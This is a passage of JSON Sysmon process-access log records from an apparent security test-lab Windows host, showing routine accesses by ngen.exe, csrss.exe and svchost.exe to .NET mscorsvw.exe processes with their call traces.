C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.261","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00102F300B00}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7405,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.261\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00102F300B00}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.261","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00102F300B00}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7406,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.277\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00102F300B00}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.277","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00102F300B00}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7407,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.293\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-001028330B00}\r\nTargetProcessId: 4484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.293","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-001028330B00}","TargetProcessId":"4484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7408,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.293\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-001028330B00}\r\nTargetProcessId: 4484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.293","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-001028330B00}","TargetProcessId":"4484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7409,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.308\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-001028330B00}\r\nTargetProcessId: 4484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.308","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-001028330B00}","TargetProcessId":"4484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7410,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.543\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010FB360B00}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.543","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010FB360B00}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7411,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.543\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010FB360B00}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.543","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010FB360B00}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
